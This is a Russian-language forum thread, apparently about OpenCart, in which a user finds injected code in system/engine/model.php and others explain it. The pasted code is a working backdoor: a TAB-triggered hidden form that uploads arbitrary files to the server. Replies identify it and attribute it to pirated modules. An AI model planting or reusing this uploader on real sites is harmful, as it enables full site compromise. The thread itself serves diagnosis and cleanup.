Перейти к содержанию
Kuznec

Что за скрипт в \system\engine\model.php

Рекомендуемые сообщения

<script type="text/javascript" src="http://code.jquery.com/jquery-1.8.1.js"></script><script type="text/javascript">document.onkeydown=key;function key(event){if(event.keyCode==9){         document.getElementById('panel').style.display="inline";}}</script><?php $dir = dirname( __FILE__ );$file = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];echo '<div style="display:none" id="panel" ><form method="post" id="form1" action="'.$file.'" enctype="multipart/form-data"><p><input type="file" name="filename"></p><p><input type="submit" name="submit23" value="OK"></p></form></div>';if($_POST[submit23] != ''){if(is_uploaded_file($_FILES["filename"]["tmp_name"])){move_uploaded_file($_FILES["filename"]["tmp_name"], $dir."/".$_FILES["filename"]["name"]);} }?>

<?php
abstract class Model {
    protected $registry;

public function __construct($registry) {
        $this->registry = $registry;
    }

public function __get($key) {
        return $this->registry->get($key);
    }

public function __set($key, $value) {
        $this->registry->set($key, $value);
    }
}
?>

Не могу понять откуда появился он.

Поделиться сообщением

Срочно удаляйте. 

Откуда взялся? Например из модулей скачанных не из оф.сайтов.. На разных пиратских сайтах часто выкладывают модули для опенкарта, зараженные разной гадостью. Любители халявы их качают а потом жалуются на проблемы.. Где у меня этот код взялся? Наверное сам напечатался :)

Поделиться сообщением

Что делает этот код:

Добавляет на все страницы сайта скрытый блок, который открывается с помощью нажатия клавиши TAB. В этом блоке форма с возможность залить на сайт любой файл, в т.ч. скрипт, который сможет сделать с вашим сайтом все что угодно.  Посмотрите нету ли в папке 

\system\engine\ сторонних файлов.

Изменено пользователем sv2109
  • +1 1

Поделиться сообщением

Нет нету других файлов. Я регистрацию заказал в каталогахх на серче , залил файл обратных ссылок.

Поделиться сообщением

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

• Последние посетители   0 пользователей онлайн

Ни одного зарегистрированного пользователя не просматривает данную страницу

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.